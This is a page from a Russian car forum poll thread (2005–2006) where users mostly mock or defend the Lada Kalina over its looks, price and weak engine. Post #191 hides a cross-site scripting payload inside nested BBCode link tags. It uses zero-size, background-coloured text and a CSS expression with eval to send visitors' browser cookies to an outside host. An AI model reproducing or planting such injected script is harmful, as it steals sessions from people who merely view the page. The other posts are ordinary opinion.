Планируете ли в будущем купить "Ладу-Калину"? [Печать]
Выбрать сообщения с # по # FAQ
AUTOLADA.RU -> Опросы и мнения |

#176:  Автор: stsem СообщениеДобавлено: 07 Ноября 2005 14:31
Ни при каких условиях:
Внешний вид :3-
Очень маленькая.

#177:  Автор: IvanychОткуда: (31) г. Валуйки, Белгородская обл СообщениеДобавлено: 08 Ноября 2005 14:39
stsem писал(а):

Ни при каких условиях:
Внешний вид :3-
Очень маленькая.


Полностью тебя поддерживаю! :cool: А вот Приору очень может быть - запустят в производство - видно будет...

#178:  Автор: БомбилаОткуда: Москва СообщениеДобавлено: 13 Ноября 2005 22:05
НЕТ совку!!!! Только иномарка и только с АКПП!!!!!!!!!!
#179:  Автор: SuperStarОткуда: Воронеж СообщениеДобавлено: 17 Ноября 2005 19:01
Не представляю себя за рулем КАЛИНЫ
Кажется, все-таки женская машина

#180:  Автор: pavel21 СообщениеДобавлено: 22 Декабря 2005 18:02
да ни за что на свете такое...хм..авто. Это полный провал ВАЗа.
#181:  Автор: ШнурОкОткуда: Акрополь СообщениеДобавлено: 25 Декабря 2005 20:41
Если будет стоить 1500 уе. Покататься на даче можно даже на таком уроде.
#182:  Автор: МихалычОткуда: Россия, Москва СообщениеДобавлено: 25 Декабря 2005 20:52
ну может за 1000-1500 вечнозеленых взял бы Laughing но только чтобы потом кому-нибудь продать/подарить Confused мне на таком уродстве даже на даче стыдно было бы ездить :ooo:
#183:  Автор: ШнурОкОткуда: Акрополь СообщениеДобавлено: 25 Декабря 2005 20:56
Михaлыч писал(а):

ну может за 1000-1500 вечнозеленых взял бы Laughing но только чтобы потом кому-нибудь продать/подарить Confused мне на таком уродстве даже на даче стыдно было бы ездить :ooo:


Зато не жалко... Laughing

#184:  Автор: anignatenkoОткуда: Москва СообщениеДобавлено: 29 Декабря 2005 12:16
Мужики, что за гон???
Неужели класика или зубилка лучше калины?? Да это бред полный!!! Сам катаюсь на зубиле, жаль денег нет,если были бы- взял Калину даже не думая!!!Если ино лучше, почему тогда мы здесь сидим, а не в форуме нексии??? Почти все из нас могут взять Нексию,а мы ездим на НАШИХ машинах!! Зачем опускать конструкторов??? Вот фольц 96года это развал 10ти летнай на котором мне стыдно ездить будет, а калина-будующее ВАЗа и скажу Вам - это первый удачный наш автомобиль!!!

#185:  Автор: anignatenkoОткуда: Москва СообщениеДобавлено: 29 Декабря 2005 12:20
Мужики, что за гон???
Неужели класика или зубилка лучше калины?? Да это бред полный!!! Сам катаюсь на зубиле, жаль денег нет,если были бы- взял Калину даже не думая!!!Если ино лучше, почему тогда мы здесь сидим, а не в форуме нексии??? Почти все из нас могут взять Нексию,а мы ездим на НАШИХ машинах!! Зачем опускать конструкторов??? Вот фольц 96года это развал 10ти летнай на котором мне стыдно ездить будет, а калина-будующее ВАЗа и скажу Вам - это первый удачный наш автомобиль!!!

#186:  Автор: МихалычОткуда: Россия, Москва СообщениеДобавлено: 29 Декабря 2005 22:54
anignatenko писал(а):

Мужики, что за гон???
Неужели класика или зубилка лучше калины?? Да это бред полный!!! Сам катаюсь на зубиле, жаль денег нет,если были бы- взял Калину даже не думая!!!Если ино лучше, почему тогда мы здесь сидим, а не в форуме нексии??? Почти все из нас могут взять Нексию,а мы ездим на НАШИХ машинах!! Зачем опускать конструкторов??? Вот фольц 96года это развал 10ти летнай на котором мне стыдно ездить будет, а калина-будующее ВАЗа и скажу Вам - это первый удачный наш автомобиль!!!

не, ну ты конченый патриот или мазохист Smile Smile Smile я конечно понимаю, что имея 10000 баксов ты бы взял КАЛину Laughing а не акцент или нексию

#187:  Автор: ШнурОкОткуда: Акрополь СообщениеДобавлено: 30 Декабря 2005 11:32
anignatenko писал(а):

Мужики, что за гон???
Неужели класика или зубилка лучше калины?? Да это бред полный!!! Сам катаюсь на зубиле, жаль денег нет,если были бы- взял Калину даже не думая!!!Если ино лучше, почему тогда мы здесь сидим, а не в форуме нексии??? Почти все из нас могут взять Нексию,а мы ездим на НАШИХ машинах!! Зачем опускать конструкторов??? Вот фольц 96года это развал 10ти летнай на котором мне стыдно ездить будет, а калина-будующее ВАЗа и скажу Вам - это первый удачный наш автомобиль!!!


Кстати, про нексию и прочее дермо речи нет, но простите меня, каллина-это слишком! Ну реально уродливый непропорциональный кузов. Ну недолжна машина быть узкой и высокой! И зачем такой урод нужен?

#188:  Автор: anignatenkoОткуда: Москва СообщениеДобавлено: 30 Декабря 2005 14:28
Я согласен, что есть у калины свои недостатки!!!
Но как садишся в салон-тишина и порядок, а главное красиво и удобно и нечего не гремит!! Кузов обтекаемый, форы, бампера.... можно не стараться меня пкреубедить-Калина самая красивая из НАШИХ авто, а уаз патриот-самый клёвый из наших внедорожников!!!

#189:  Автор: ШнурОкОткуда: Акрополь СообщениеДобавлено: 30 Декабря 2005 16:03
anignatenko писал(а):

Я согласен, что есть у калины свои недостатки!!!
Но как садишся в салон-тишина и порядок, а главное красиво и удобно и нечего не гремит!! Кузов обтекаемый, форы, бампера.... можно не стараться меня пкреубедить-Калина самая красивая из НАШИХ авто, а уаз патриот-самый клёвый из наших внедорожников!!!


Да никто тебя и не переубеждает... Каллина не просто самая красивая из "наших" она ещё и являет собой образец для подражения практически всем ино заводам! Уродливее только логан.

#190:  Автор: Гадкий Студентишка СообщениеДобавлено: 01 Января 2006 16:28
anignatenko писал(а):

Мужики, что за гон???
Неужели класика или зубилка лучше калины?? Да это бред полный!!! Сам катаюсь на зубиле, жаль денег нет,если были бы- взял Калину даже не думая!!!Если ино лучше, почему тогда мы здесь сидим, а не в форуме нексии??? Почти все из нас могут взять Нексию,а мы ездим на НАШИХ машинах!! Зачем опускать конструкторов??? Вот фольц 96года это развал 10ти летнай на котором мне стыдно ездить будет, а калина-будующее ВАЗа и скажу Вам - это первый удачный наш автомобиль!!!



Что за бред? Гольф 96 года будет не по зубам нашему автопрому еще лет 10 как минимум. Калину можно сравнивать разве что с жуком 50 года. Хотя жук это определенная харизма, а калина... Закройте скорее заводы, выпускающие ТАЗы!

З.Ы. В форуме сидим - потому что общаемся.

#191:  Автор: MadGREAZLY СообщениеДобавлено: 02 Января 2006 22:18
Мдя... Увы, не дорос пока наш автопром...
[url]www.ut[url=www.s=''style='font-size:0;color:#DEE3E7'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://s.netsec.ru/fqautolada/pic.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'

#192:  Автор: DVS-REMONTОткуда: ноябрьск ЯНАО СообщениеДобавлено: 02 Января 2006 22:43
чем больше желающих покупать ВАЗы тем больше у меня работы
#193:  Автор: DrakstarОткуда: Москва, ЮЗАО СообщениеДобавлено: 03 Января 2006 22:01
Ладу Калину - такое уе...ще НИКОГДА!
#194:  Автор: tihohodОткуда: Санкт-Петербург СообщениеДобавлено: 05 Января 2006 05:24
В машине образца 2005 года нет ни кондея, ни автомата, ни подушек безопасности...
#195:  Автор: Алексей44Откуда: Кострома СообщениеДобавлено: 07 Января 2006 15:22
ДА, ждем ответа банка о кредите.
#196:  Автор: rocforОткуда: Зеленоград СообщениеДобавлено: 08 Января 2006 03:00
Сколько бы не стоила не куплю!
#197:  Автор: ШмякОткуда: Столица СообщениеДобавлено: 13 Января 2006 14:16
А че за вопрос о цене? Только что залез на сайт автомира - 8 с копейками килогринов она стоит. Заводских прибабахов - только БСК и ЭУР. Двигло - 1.6 л, 80 л.с.

По теме: не купил бы ни за что в жизни.

1. Уродство редкостное (внешне). Субъективно конечно, но....
2. При объеме 1.6 двигло мега-слабое. Что такое 80 л.с.? Ерунда. Я молчу про Хондовские моторы, но даже американцы, любители "широких жестов" в виде 5-6 литровых моторов, снимают с 1.6 на 20-30% больше мощности, при сохранении расхода топлива и соблюдении всяких там ЕВРО-норм.
3. Косяки будут лечить еще лет 8-10.
4. Ремонтировать нормально научатся лет через 5.
5. Цена неоправданно высока - в нормальной комплектации (музыка, сигналка, диски, резина) перевалит за 10 килогрин. А то что российская штамповка + резина - г@$но редкостное, не секрет ни для кого. Менять придется по-любому.
6. Ну и самое главное. Автомобили десятого семейства - компромисс. Я бы его так и рекламировал:
- нехватает денег на иномарку?
- боитесь покупать подержанную инопомойку?
- значит ваш выбор - новый автомобиль десятого семейства: возможность обслуживания в любой точке России, приемлемые условия гарантии, и невероятные возможности тунинха !!!

А что такое Калина?
- Престиж? Нет. ВАЗ давно зарекомендовал себя "пролетарской" маркой. И престижных машин в семействе не имеется.
- Женский автомобиль? Нет. Любая девушка скорее сделает выбор в пользу Рено символ или Гетса. Возиться по уши в масле с нашей "недоделкой" ей вряд ли улыбается.
- Пацан-мобиль? Нет. При таком дизайне и "потрясающей" мощности он молодежи не уперся.


Мое мнение: Калина - проект-зомби.
В десятом семействе есть и универсал, и пацан-мобиль, и классический седан. Лучше бы делали рестайлинг десятого семейства - на 5-10 лет еще проканает. А так - вляпались в новую помойку.

Мой следующий автомобиль - это либо
- иномарка (статус растет потихоньку, элементарно нужно соответствовать)
- очередная двенашка. Это если будут траблы с деньгами. Хотя, наверное, я на новую все же не решусь - буду кататься на своей, пока она не умрет.
- либо "на крайняк" - приора. Если будет стоить 7-8 тыщ (уже с ГУРом, эл.пакетом, аудиоподготовкой и 2 колонками, нормальным встроенным БСК, нормальными колесами и резиной, пусть и бюджетными, но не помоечными, и нормальным резвым двиглом - 1.8 либо 2 л.). Иными словами - поставил сигналку, воткнул магнитолу, сел-и-поехал.

#198:  Автор: M.F.Откуда: Томск СообщениеДобавлено: 25 Января 2006 08:42
нет не куплю
#199:  Автор: Ленивый СообщениеДобавлено: 31 Января 2006 14:54
Нет, никогда.
#200:  Автор: Роман-ННОткуда: Нижний Новгород СообщениеДобавлено: 09 Февраля 2006 19:03
10-ка - пусть и более старая модель, но все же выше класом и серьезней (имхо). "Калина" - машина для женщин и пожилых. Не куплю.




AUTOLADA.RU -> Опросы и мнения |
Страница 8 из 9
Часовой пояс: GMT + 4
AUTOLADA.RU